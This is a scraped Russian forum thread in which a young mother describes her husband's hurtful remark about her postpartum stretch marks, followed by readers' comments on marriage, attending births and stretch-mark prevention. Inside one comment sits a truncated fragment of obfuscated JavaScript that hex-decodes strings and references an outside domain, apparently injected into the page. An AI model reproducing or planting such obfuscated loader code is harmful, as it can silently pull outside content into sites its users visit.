Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : История из жизни
55 минут назад2016-12-03 18:03:25 от саша кот
7974Арийка*** , спасибо) Все комментарии67542
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
На работу к папе
два часа назад2016-12-03 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Истории о любви - любим душу иои тело?
Истории о любви : любим душу иои тело?     Находилась в ужасной депрессии после родов. Лишний вес, живот, зависшее тело... Прошло 40 дней уже и я привела себя в порядок. Сбросила 10 кг и вешу 57, как до беременности. хожу в спортзал и стараюсь стать подтянутой снова.

Уважаемые читатели. Уверена что не многие после первых родов и швов готовы заняться собой в первые два месяца. У меня получилось, но ситуация такая...

Замужем уже год почти. Вышла замуж за любимого человека. Как от мужа, я после родов ожидала от него поддержки. Мне было больно сидеть. У меня была процедура назначенная с антибиотиком во внутрь женского полового. Сама я не могла двигаться так чтобы сделать это. Муж отказался помочь. Очень ожидала помощи так как восполнилась внутри и болело очень. В итоге он сделал это несмотря даже.

Прошло 40 дней. Ищу способ избавиться от растяжек. Живот обратно подтянуть получился. Спрашиваю у мужа что бы делать, сходить на массаж или нет. При этом рассматриваю растяжки в зеркале.

Получила прекрасный ответ- не надо мне это показывать, после того как я это увижу, просто не захочу тебя...

Что мы получается любим? Тело? Хотят потому что нет растяжек? У меня много примеров как мужья женам помогают и сами массаж делают от растяжек на животе и на интимных местах. Я получается рассчитывать на поддержку или хотя бы слов таких, как милая пройдут, сходи или не сходи- попросту не могу.

Я думала что на мужа можно полагаться и рассчитывать на его поддержку в столь трудные для меня моменты. Но уже который раз чувствую себя говном и стыдно даже перед ним раздеваться.

Разговоров было не мало, но не помогло. А сегодня я промолчала. это последняя капля. Думаю пора бы ему искать девочку с красивым телом. "любимая" женщина, родившая для него сына, просто не то что надо, противно смотреть получается.

Никогда не было к нему претензий не смотря на то что весит он не мало и у самого от этого растяжки на боках. По моей инициативе тоже ходит в спортзал. Но я ни разу не обидела его этим. Хочу я в конце концов его, а не его тело.

А сама начала просто страдать от низкой самооценки из-за такого его отношения ко мне. Не знаю как поступить. Мне 22 . Ему 28
64259
Другие Истории о любви
(36)
О-ля-ля
20862 О-ля-ля
О-ля-ля offline
Репутация : 33459
Комментариев 238 4
24 апреля 18:26:02
2016-04-24 18:26:02

Говнюк, вот он кто! А когда Вы состаритесь (что неминуемо), он тоже морщинками поприкать будет? Тоже мне, мистер совершенство.

Ответить
Поддерживаю Да1 / Нет0
Никто не может сделать вас счастливыми – только вы сами способны сделать это. Бейонсе
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235647
Комментариев 1762 1
24 апреля 19:04:04
2016-04-24 19:04:04

Есть такая категория людей. Есть мужчины, ктороые идут с женщной на роды, смотрят весь процесс. Потом говорят, что мол увидив как вылазит ребёнок из этого места, больше не чувствуют к жене влечения. Многим это по барабану. Видимо он у вас в какой-то степени брезгливый.

С одной стороны я бы тоже обратила внимание на стройного слегка подкачанного ухоженного молодого человека, чем на жирного расплывшегося парня. И в сексуальном плане врядли кого привлекают 200-кг дяди.

Это я не к тому, что вы жирная, толстая и проч. Это я к тому, что вашего мужа привлекают красивые тела и он бы не хотел увидеть ваши изъяны тела. Ну вот такой он у вас. Это не повод ссорится, просто не надо вешать на него ваши массажи, растяжки и проч женские дела. Точно так же как т бритье ног и выщипывание бровей, я считаю, что мужик этого не должен видеть. Это женский туалет.

Ответить
Поддерживаю Да5 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 441737
Комментариев 7605 30
24 апреля 19:59:05
2016-04-24 19:59:05

Тоже мне идеальный мужчина. Видимо не понимает, что после родов на теле остаются следы растяжек. Не захочет он!Он на теле женился или на вас?

Я конечно все понимаю, что следить за собой надо. Но ведь и он сам не предел совершенства.

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Bert
20913 Bert
Bert offline
Репутация : 122689
Комментариев 1160 1
24 апреля 20:00:51
2016-04-24 20:00:51

Мужчины разные бывают, кто то спокойно реагирует на перемены женщины после родов, до родов, а кто то замечает каждую мелочь. Конечно не легко, когда нет поддержки со стороны мужа, но и требовать нет смысла. Так как он такой, какой есть. Если вы будите постоянно настаивать на этом, он может вообще потерять интерес к вам. Не легко вам будет, так как всегда нужно надеяться только на себя и всегда держать себя в форме. Но и он соответственно должен её держать, чтоб соответствовать вам. Мне почему то показалось, что для вас это тоже имеет немаловажную роль. Душа или тело? !Хорошо, когда всё по не многу присутствует. Есть красивое тело, но что то отталкивает от человека, а бывает тело имеет изъян но что то притягивает к нему как магнитом. Смотря кто, что ценит. Каждый в этом мире индивидуальный.

Ответить
Поддерживаю Да0 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1662407
Комментариев 6907 36
24 апреля 21:39:57
2016-04-24 21:39:57

Я соглашусь с [Девушкой]. Да, многие скажет, что муж говно и эгоист, может где-то они и правы. Но с другой стороны, я считаю, что у женщины должны оставаться какие-то только свои, женские проблемы. Подруге мы можем позвонить и посоветоваться, как лучше брить ноги, бороться с раздражением в зоне бикини или убрать целлюлит с задницы. С подругой (или мамой, в общем женщиной) мы можем обеспокоенно поделиться какими-то гинекологическими проблемами, типа менструаций, выделений и всяких других приятностей. Но мужчинам это все знать не обязательно. Не потому что разлюбит. А просто не нужно ему это знать.

У вас был лишний вес, вы рекордно быстро от него избавились (большая умница!), у вас растяжки, думайте, что с ними делать. Ваш муж и так их увидит, незачем ему их постоянно демонстрировать и заострять на них внимание. Он же не попрекает вас ними, я так поняла? Он просто не хочет о них думать. И правильно делает.

Мужчины, провожая взглядом красотку, видят ухоженную женщину, с гладкими ногами, чистой кожей и блестящими волосами. Они не знают, что она до этого мазала ноги вареным сахаром, на лицо наносила вонючую маску цвета детского поноса при дисбактериозе, а в волосы втирала вообще неизвестно что и неизвестно сколько с этим ходила. Каждая ухоженная женщина прикладывает усилия для того, чтобы такой быть. Но если мужчина будет видеть других просто красивыми, а вас в зеркале, рассматривающей свои растяжки... Это может плохо закончится для вас.

Ваш муж может и не очень хорошо вам ответил, но это было честно. Большинство мужчин так думают, ваш не один такой ужасный.

Даже если попытаться судить по себе. Если любимый слег, скажем, с поносом, вы его не разлюбите, будете ухаживать и переживать. Но если он каждый раз будет вас звать в туалет, чтобы вы оценили, как изменился цвет с прошлого раза, очень скоро он будет вызывать у вас ассоциации с говном. Поэтому лучше решать все неприятные глазу моменты без его участия, и восприниматься мужем как женщина, сумевшая сбросить вес через 2 месяца после родов, а не как женщина, покрытая растяжками.

Ответить
Поддерживаю Да8 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Осенняя
17330 Осенняя
Осенняя online
Репутация : 401434
Комментариев 2258 2
24 апреля 21:52:44
2016-04-24 21:52:44

Мужчины все разные. Иной раз просто удивляешься, когда видишь красивого мужчину рядом с какой нибудь замухрышкой. И это хорошо, что есть такие пары, где любят как раз за душу и этому мужчине кажется его невзрачная жена самой-самой А есть эстеты, для которых нужно хорошо выглядеть, следить за собой, чтобы ему было приятно рядом с такой женщиной находится и другим показать не стыдно. Так что винить мужа автора, мне кажется. не нужно, он такой какой есть. А про массаж на интимном месте я не слышала, как он выглядит и с чем его едят? или это обычная Камасутра?

Ответить
Поддерживаю Да1 / Нет0
Бельчонок777
17586 Бельчонок777
Бельчонок777 offline
Репутация : 15633
Комментариев 164 5
24 апреля 22:04:57
2016-04-24 22:04:57

ничего не могу посоветовать, только могу сказать, что понимаю Вас, как Вам тяжело.... потому что после родов итак такой период депрессивный, и когда нет поддержки от любимого человека, это ну оооочень тяжело... Сама два месяца назад родила, и хоть не сильно поправилась, все равно сильно комплексую перед мужем тоже из-за растяжек, но он, видя это, наоборот подбадривает и говорит, "что ты на них обращаешь внимание, я очень люблю тебя, разве тебе это не главное?", конечно главное, но самой- то хочется выглядеть красиво , как раньше... поэтому представляю, как Вам сложно... потому что не представляю, если бы муж меня не подбадривал, чтобы со мной было...

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Хелен
Хелен

24 апреля 22:05:47
2016-04-24 22:05:47
А вам самой не противно с ним жить и знать, что ваш любимый с таким презрением отнесся к вам? Растяжки ему видите ли мешают. Сам то свой лишний вес поди ещё не смог сбросить. Я б на вашем месте его носом в его же недостатки хорошенько так ткнула бы.
Ответить
Поддерживаю Да2 / Нет0
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
24 апреля 22:49:44
2016-04-24 22:49:44

Вообще в таких ситуациях мне всегда хочется сказать женщинам: зачем вы откармливаете себя во время беременности, а потом плачете над растяжками и огромным пузом? Вот это:есть за двоих, и мне все можно, потому что я беременная, и играет свою злополучную роль. Ешьте умеренно, только самое полезное и ни грамма сахара и все будет ок после родов. Двигаться надо побольше. О растяжках надо думать во время беременности, а не после. С первых месяцев живот, грудь, бедра мазать специальным гелем, кремом для беременных и не будет растяжек.

Ответить
Поддерживаю Да4 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
Гость
Гость

25 апреля 00:02:41
2016-04-25 00:02:41
Как говорится, мужской эгоизм во всей красе! Вместо грамма сочувствия к страдающему от болей человеку, вместо минимальной поддержки и помощи, вашего благоверного прежде всего беспокоит вопрос встанет ли у него детородный орган на располневшую и подурневшую после родовых схваток супругу. Могу себе представить ваше состояние! Лично мне было бы противно ложиться с мужем в одну кровать, если бы я услышала от него нечто подобное. Полагаю, таким отношением ваш муж уже сделал первый шаг к разводу. И стоит ли, даже ради ребенка, оставаться в обществе человека, который абсолютно вас не ценит.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

25 апреля 02:10:35
2016-04-25 02:10:35
Я не знаю, мне кажется когда женщину любят не видят изъянов, мой муж сказал мне я люблю твоё тело твои груди, твоё тело, каждый сантиметр твоего тело, и он реально с такой любовью смотрел и говорил это, хотя после родов, мои груди очень маленькие и обвисли, фигура худышки- никакой фигуры, про растяжки молчу, просто не было у меня комплексов этих никаких, может благодаря мужу, не заостраю внимание. И я так же не замечаю в нем изъянов. Считаю, что женщина сама знает как и когда за собой следить и мужчина не должен в это лезть.
Ответить
Поддерживаю Да1 / Нет0
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 897 15
25 апреля 02:27:16
2016-04-25 02:27:16

Значит так любил.

Я уже писала однажды - если мужчина не любит, искренне, всем сердцем, то ему всегда что-то не так в женщине - то поправилась, то слишком похудела, то цвет волос не тот, то растяжки... Понятное дело что ухаживать за собой нужно, этого никто не отменял. Но и не соглашусь с теми, кто считает что растяжки не появятся если кремом мазать. Их будет меньше, но они будут, и не потому что "жрешь" много, а потому что плод большой, например, или многоводие, или кожа неэластичная, ведь у каждой женщины организм разный.

Не понимаю таких мужчин как ваш муж, автор. Не зарекаюсь, конечно, но мне повезло. Каждый сантиметр целует мой, хоть похудею, хоть поправлюсь - одинаково и с любовью.

Может поговорите с ним на эту тему? Или бесполезно? Эстет хренов. Вот из-за таких мужиков наши женщины и обростают комплексами.

Автор малыша ему родила, а он.. убила бы таких.

Ответить
Поддерживаю Да3 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
Неалина
5436 Неалина
Неалина offline
Репутация : 441737
Комментариев 7605 30
25 апреля 08:23:13
2016-04-25 08:23:13

У меня к примеру они тоже появились когда двойня была. Одни дети только на 6. 500 общий вес. Плюс воды и все остальное. Говорили носи бандаж и ничего не будет. Тогда еще не было всяких гелей и прочего. А дети крупные и бандаж потом не налезал на живот. И какаими б у меня бывшие не были ни один мне не сказал что не захочет меня.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 441737
Комментариев 7605 30
25 апреля 08:24:56
2016-04-25 08:24:56

Лично я думаю что когда любят только тело отношения не долговечные. Тел много всяких. А вот душа у каждого своя.

Ответить
Поддерживаю Да3 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
25 апреля 09:39:04
2016-04-25 09:39:04

Может стоит и к нему начать так относится, тонко но упорно показывать его недостатки, пусть тоже чувствует себя какашкой.

Ответить
Поддерживаю Да3 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Monica
20189 Monica
Monica offline
Репутация : 36652
Комментариев 342 1
25 апреля 12:49:34
2016-04-25 12:49:34

У меня тётка работает акушером гинекологом в роддоме на Покровке уже 30 лет.

Так вот за всю свою карьеру, она такого насмотрелась!

Но больше всего её всегда поражали такие женщины: после родов же сразу нельзя посещать роженец, и вот их мужья стоят под окнами, с цветами, шариками и кричат: ну как дела любимая!!!

А она ему в ответ: порвалась!

Он ей: сильно?

Он ему: да, аж в двух, трёх местах!

Он ей: ой ой ой!

Так вот я к чему! Она всем и всегда не перестаёт твердить: ну не нужно своим мужьям сообщать в каком месте и сколько раз ты порвалась! Не за чем им это знать! Это должно оставаться в тайне! Меньше знают, крепче спят!

Все мужики разные! У кого то после такого, извиняюсь за выражение, стоять на жену не будет! А кому то это по барабану.

Я соглашусь с высказываниями выше! У женщины должны быть свои секреты! И не за чем заставлять мужа делать вам уколы в интимные места!

Вы хотите, чтобы у него потом было отвращение к вам?

Заставили бы его ещё себе клизму сделать! А потом бы удивлялись...

Я вообще поражаюсь женщинам, которые берут своих мужей на роды!!!

Как? Зачем? Для чего? Хоть кто нибудь это может пояснить?

Чтобы ему потом кошмары снились и сексуального влечения к жене не было?)))

Ответить
Поддерживаю Да6 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
25 апреля 13:06:08
2016-04-25 13:06:08

Monica, я своего брала, так как дико боялась, у меня истерики были, я не так боялась родить, как тех кто роды принимал, у меня, схватки 3 суток были, к концу я уже совсем никакая была, пока у мужа нервы не здали, он навел шороха, мне пришли капельницу поставили, стали советы давать что да как и потом я уже родила. Это для меня было таким ужасом что еслибы не муж рядом, я не знаю как это все перенесла бы. О нашем роддоме ужасные слухи ходят, обращение ужаснейшое, это плюс к тому что денег не жалели. Запомнила на всю жизнь...

Ответить
Поддерживаю Да3 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Monica
20189 Monica
Monica offline
Репутация : 36652
Комментариев 342 1
25 апреля 13:10:33
2016-04-25 13:10:33

Ночная Фурия, Ну понимаете, мужчины же тоже все разные, ваш пошел с вами "рожать", а другой бы просто, пришёл, навёл бы там шороху, как вы говорите, и сидел бы в коридорчике или дома, ждал бы пока вы родите.

Я вот честно скажу, из всего моего окружения и моих знакомых, нет ни одной пары, где бы муж присутсвовал на родах.

Они все в один голос кричат, что им там делать нечего! И видеть они весь этот ужас не хотят!

И я считаю, это правильно!

Ответить
Поддерживаю Да5 / Нет0
О-ля-ля
20862 О-ля-ля
О-ля-ля offline
Репутация : 33459
Комментариев 238 4
25 апреля 13:12:00
2016-04-25 13:12:00

После совместных родов, между мужчиной и женщиной такая связь появляется, которую словами описать трудно. Это как вдвоем рожали, вся боль на двоих делится и все счастье тоже. Не каждому дано такое пережить. Однако, это все верно только для тех мужчин, которые этого сами хотят. А насильно - получается отвращение. А вообще, история не об этом, а о том, что муж не поддерживает свою жену, и сам, будучи еще тем красавцем, требует от нее очень много. Если ей нужна его помощь, что ей, соседа просить что-ли? Еще и комплексы в ней выращивает. но это мое, субъективное мнение.

Ответить
Поддерживаю Да2 / Нет0
Никто не может сделать вас счастливыми – только вы сами способны сделать это. Бейонсе
Monica
20189 Monica
Monica offline
Репутация : 36652
Комментариев 342 1
25 апреля 13:15:59
2016-04-25 13:15:59

О-ля-ля, Вы о чём вообще? Какого соседа просить? Все эти процедуры делают в поликлинниках! Приезжайте туда и вам сделают в гинекологическом кабинете всё что нужно!

Как же люди, которым некому дома колоть уколы, ходят в поликлинники и там их колят!

P. S. После совместных родов связь между мужчиной и женщиной может как появиться, так и пропасть навсегда!

Что значит вдвоём рожали?!

Мужчине по природе не свойственно рожать!

Ответить
Поддерживаю Да3 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
25 апреля 13:19:10
2016-04-25 13:19:10

Monica, если после того как родился ребенок которого ждали и хотели пропала связь, то её и не было, и любви не было. Что это за мужик такой, что ему страшно на родах быть, а жене значит не страшно и не больно.

Ответить
Поддерживаю Да3 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Monica
20189 Monica
Monica offline
Репутация : 36652
Комментариев 342 1
25 апреля 13:28:16
2016-04-25 13:28:16

Ночная Фурия, Частично соглашусь с вами.

Но... Опять двойные стандарты. Давайте женщины теперь возьмут на себя обязанности мужчин и наоборот.

Каждому по природе отведёно своё!

Никто не говорит о том, что мужчина не должен поддерживать женщину, да нам больно, тяжело и страшно рожать, но ведь это в нас заложено!

Так же как в мужчинах заложено быть добытчиками семейства.

Ответить
Поддерживаю Да0 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1662407
Комментариев 6907 36
25 апреля 13:29:40
2016-04-25 13:29:40

О-ля-ля, Ну чем он может ей помочь? Как реально мужик должен убрать растяжки на теле жены? И потом, автор разве сказала, что он от нее чего-то требует? Она его просит о совете. А вот на самом-то деле, ну какой мужик может дать совет женщине о растяжках?

Насчет родов, это личное дело каждого, но я бы сама не хотела, чтобы мой мужчина видел меня в такой момент моей жизни. Тем более, что отвращение действительно может появиться, не потому что мужчина не любит, а потому что мужчины боятся этого. У них этого нет и они этого не могут понять так, как женщины. Для них это все не так, как для нас.

Муж моей подруги дважды присутствовал с ней при схватках, помогал, поддерживал, но в момент родов он выходил. В первый раз врач перепутал и позвал его перерезать пуповину. Муж, подумал, что уже все, смело вошел, с мыслью, что увидит улыбающегося младенца и уставшую жену. А увидел (по его словам) "Возле нее стоял какой-то таз, и он был полный крови. А прямо из нее тянулись какие-то кишки или не знаю что". Он просто начал терять сознание, медсестрам пришлось бросать роженицу и вытаскивать папашу в коридор.

Не знаю, я считаю, что это не говорит о том, что муж не любит. Это говорит о том, что их психика не готова к некоторым нашим женским проблемам. И не только женским.

Даже если отбросить тему беременностей и родов. Я думаю, если мужчине не говорить каждый день: "Глянь, как я поправилась, 7 кг набрала". "Посмотри, как у меня задница обвисла, а на ляжках целлюлит"... и т. д - велика вероятность, что он этого вообще не увидит. Потому что любят все-таки не тело, а человека, и на всякие растяжки могут вообще внимания не обратить, если конечно не тыкать в них носом каждый день и не говорить: "О боги, какие у меня жуткие растяжки. Я жирная просто уродина"...

Ответить
Поддерживаю Да6 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
25 апреля 13:32:44
2016-04-25 13:32:44

Каждый конкретный мужчина реагирует по-своему, есть те, кто способен вынести с женой роды и увидев все это, не перестать воспринимать ее как женщину. Но есть те, кто по природе своей брезглив и тд, и не может он себя заставить. А если поприсутствует, то может появиться отвращение. И это не потому что он плохой, ну не может он с собой ничего поделать. Была бы я мужиком, тоже не стала бы ходить на роды.

Ответить
Поддерживаю Да2 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
О-ля-ля
20862 О-ля-ля
О-ля-ля offline
Репутация : 33459
Комментариев 238 4
25 апреля 13:34:37
2016-04-25 13:34:37

Monica, блин, я Вам целую повесть написала, и нечаянно удалила... Скажу кратко. До родов, тоже не хотела, чтоб муж был со мной, по причинам, указанным Вами. Муж категорически настоял на партнерских родах. Я уступила и ни секунды не пожалела. В следующий раз только вместе. А о своих страхах, что он меня не захочет, что ему будет противно, я ему в лоб сказала. У него было такое ошеломленное лицо, и спросил, как я вообще до такого додумалась. А момент, когда отец берет малыша на руки - это самое прекрасное на свете. Однако повторюсь, это не для ВСЕХ! Есть мужчины, которые брезгуют. Ну вот как факт, насильно тянуть такого на роды - это бред. Толку от него не будет, одни проблемы.

И еще, а среди моих знакомых много пар, которые вместе рожали, и ни одного фу, я не слышала. Они все счастливы в браке.

А про связь, безтолку объяснять, пока не попробуешь сам, не поймешь!

Ответить
Поддерживаю Да4 / Нет0
Никто не может сделать вас счастливыми – только вы сами способны сделать это. Бейонсе
Ключик
15316 Ключик
ключик offline
Репутация : 12751
Комментариев 133 2
25 апреля 16:44:42
2016-04-25 16:44:42

Какая тема интересная 😄. Вот тут многие на мужа накинулись: эгоист, нет сочувствия от него и пр. А о каком сочувствии речь? и чем он должен помочь? Правильно он сказал: не нужно тыкать недостатками, тогда он их тоже не будет воспринимать. Нет ничего хуже для мужчины, чем комплексующая женщина, талдычащая о той или иной складке. Делайте против своих недостатков, что считаете нужным, и не нужно его втягивать насильно во все это. Крепче отношения будут.

насчет темы родов: я рожала одна, мужа своегг на роды не позвала, не хотелось мне перед ним орать, тужиться и вытуживать при этом не только ребеночка. Я реально не понимаю, чем он мне мог бы на родах помочь? Ну постоял бы рядом, не знал бы куда себя деть: все при делах, один он нет. Не понимаю, почему это стало так популярно, тащить мужчину на роды. Тут даже уже "мы рожали" проскользнуло. Смешно читать такое.

Ну так то конечно, тема полярная: те кто за, останутся за. Как и те кто против, останутся против...

Ответить
Поддерживаю Да5 / Нет2
О-ля-ля
20862 О-ля-ля
О-ля-ля offline
Репутация : 33459
Комментариев 238 4
25 апреля 16:55:05
2016-04-25 16:55:05

Ключик, Не многие! Мы в меньшинстве{#}

Ответить
Поддерживаю Да1 / Нет0
Никто не может сделать вас счастливыми – только вы сами способны сделать это. Бейонсе
Ключик
15316 Ключик
ключик offline
Репутация : 12751
Комментариев 133 2
25 апреля 17:44:58
2016-04-25 17:44:58

О-ля-ля, в меньшенстве, да не в обиде :)

Ответить
Поддерживаю Да0 / Нет0
QueenOfHearts
21100 QueenOfHearts
QueenOfHearts offline
Репутация : 4364
Комментариев 30 0
26 апреля 14:05:45
2016-04-26 14:05:45

Ключик, что-то не ставится "да" с телефона, так что, поддержку комментарием)

Ответить
Поддерживаю Да0 / Нет0
Ключик
15316 Ключик
ключик offline
Репутация : 12751
Комментариев 133 2
26 апреля 21:48:59
2016-04-26 21:48:59

QueenOfHearts , спасибо, поддержке всегда рада :) у меня вот на планшете смайлики не открываются, тоже что-то не так... тоже очень жалко :(

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

27 апреля 14:42:48
2016-04-27 14:42:48
Автор статьи Спасибо девушки и женщины за отклики на мою историю. Как выяснила я сама для себя - муж из тех, кому не нужно все видеть и не умеет он этого делать. А я из таких, кто не принимает мужа только как мужа, принимает как родного самого и хочет поделиться с ним. Но в нашей с ним ситуации конечно дружбы никакой не выйдет. Если мне упрямиться - разочаруется он. Если мне отступать - мне будет больно не хватать общения по душам. Ну уж иначе тоже никак. То что он сказал, Было конечно грубо, но как сказала одна из Вас - сказал он это честно. И всегда честно говорит - и я всегда искренне обижаюсь. Не уверена что перестану обижаться, но принять его как друга точно перестану. И тогда не на что будет обижаться. Одна из вас написала что переедать не нужно при беременности. Вы скорее всего не родили? 13 кг поправка - это не переедание. Огромный живот и крупный плод никак не связаны с перееданием. Крема и средства против растяжек - они не всегда помогают так как написано на них. И уж поверьте, ни одна женщина не мечтает о растяжках и большом животе. Но к сожалению живот и растяжки с едой не связаны. )) По поводу родов парой. Я компромиссно к этому отношусь, но сама не захотела чтобы муж был рядом, и считаю что правильно поступила. Он не тот человек, кто мог бы присутствовать там. Да многие сами хотят, да у многих после этого связь и все такое. А в моем случае после этого у нас скорее всего была бы дыра в отношениях еще больше. Да и в тот момент никого видеть не хотелось - в том числе и мужа.
Ответить
Поддерживаю Да1 / Нет0
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
27 апреля 15:29:53
2016-04-27 15:29:53

Гость, ошибаетесь, я рожала. С начала беременности знала, что ребенку нельзя сладкое, что от сладкого у ребенка после рождения может быть аллергия и что откармливаться во время беременности тоже нельзя, рожать тяжело будет. Ела по мере надобности, двигалась очень много. Если честно, дома даже специально полы мыла не шваброй, а руками. Мне сказали, что легче будет родить, если сохранить двигательную активность. Итог: я честно сказать не помню, сколько я набрала, помню, что при выписке с роддома я была худая. Только живот был, не встал на место, но спустя месяца два привела в порядок живот. Гелем (не буду рекламировать название) я стала пользоваться не из-за рекламы, а потому что золовка посоветовала, она тоже рожала за полгода до меня и ей он помог. Начала им пользоваться буквально с 3 или 4 месяца. Не было у меня растяжек, не поверите, но не было. И нет. Я не знаю, не буду утверждать, что вот я такая молодец, возможно это свойство моего организма, а не только моя заслуга. Но почему я об этом говорю. Одна знакомая девушка рассказывала мне , так с любовью, как она каждый вечер своей беременности просила принести любимого с магазина нестлешку( шоколад был такой с печеньем) с соком. И как он бежал и покупал. Зато теперь ходит толстая как корова и ноет, что похудеть не может. Сказала ей, меньше нестлешек жрать надо было, обиделась.

Ответить
Поддерживаю Да0 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
Гость
Гость

27 апреля 16:12:04
2016-04-27 16:12:04
Moody, Меня жутко тошнила от сладкого. Я лежала токсикозом на 13 неделе 2 недели, так как похудела и не могла ничего есть. Из за этого анемия была до самого конца. Хана было гемоглобину. После 23 недели еще на 2 недельки пришлось лечь с ужасным тонусом и угрозой преждевременных родов. Ездила на работу каждый божий день на 2 автобусах. 5 часов на дорогах, редко сидя. Думаю активности было уж больше чем можно беременной женщине. + работа программиста до 12 или часа ночи. Едой увлекаться не было времени. В конце поправилась кг на 5 сразу из-за почек, которые начали выполнить обратную функцию. Я ходила много, а оказалось что из-за этого вес скачет. Одним словом - сложная беременность. Я очень хорошо следила за кожей живота. Старалась как могла и чем могла. Но окружность живота - 105 - все же сделала свое( буквально за неделю. на 36-37 неделе все пошло поехало со всех сторон. Мужа в магазин не отправляла ;) разве что за апельсинами изредко. Мне очень очень сильно хотелось апельсины, но страх аллергии конечно не дал мне кушать их в большом количестве. Родила за час после того как воды отошли. Схватки длились не долго. И сейчас на диете + спорт. Подтянулась сразу и живота нет - а вот растяжки эти!!!! бледные и ужасные. (
Ответить
Поддерживаю Да0 / Нет0
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
01 мая 23:43:17
2016-05-01 23:43:17

Никогда бы не стала показывать мужу растяжки или спрашивать как мне от них избавиться!!!Это все женские дела и мужчин не нужно посвящать в это!Это сравнимо с эпиляцией или с женскими днями, мужику о таком знать не надо!Если бы я была в вашей ситуации то просто пыталась бы эти растяжки как-то скрыть или сексом и в темноте заниматься можно в крайнем случае)))ну в общем мужу бы ни за что свои недостатки не показывала бы!

Ответить
Поддерживаю Да3 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Laura6767
21427 Laura6767
Laura6767 offline
Репутация : 0
Комментариев 1 0
03 июня 14:06:18
2016-06-03 14:06:18
Что за глупости? Людская тупость не знает границ. Такое ощущение, что вы "сегодня познакомились, завтра поженились", и вам не больше 15 лет. Зачем сходиться/заключать брак, основываясь на внешнюю симпатию? Человек - не кукла. Он может полнеть, худеть, стареть. И это нормально! Если до кого-то не доходят такие простые вещи, то на что он(а) вообще надеется, вступая в брак? Растяжки, лишний вес, косметика... Да если этому уделяется повышенное внимание, глупо наивно верить, что у вас может быть счастливая семья. Отсюда и массы разводов. Мужчины хотят принцесс, а женщины - принцев. При этом никто-таки не хочет признать, что сам он - простой смертный со своими недостаткам. Спускаемся с небес на землю, дамы и господа. Идеалов не существует. У каждого есть недостатки: один толстый, другой лысый, третий не знает таблицу умножения. Прекрасные принцы и принцессы существуют только в сказках, в реальной жизни таких нет и не будет. Можно до пенсии прождать идеального партнера, а можно научиться видеть приятные особенности в простых, окружающих вас людях. Пусть девушка не модельной внешности, зато она, может быть, прекрасный повар и отличная мать. Пусть мужчина не миллионер, зато, возможно, он верный и порядочный. Выбор за вами. Можете ждать несуществующих людей, теряя лучшие годы жизни, а можете обратить внимание на окружающих. Все люди разные, но это можно понять только тогда, когда перестанешь смотреть на тело, а заглянешь в душу.
Ответить
Поддерживаю Да0 / Нет0
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
04 июня 00:41:05
2016-06-04 00:41:05

Laura6767 , А я бы с вами поспорила!Всегда нужно стремиться к идеалу!И принцессы есть и принцы, и половинки есть идеально подходящие просто их надо найти. Конечно согласна что совсем без недостатков людей нет, но есть те у кого их минимум)

Ответить
Поддерживаю Да1 / Нет0
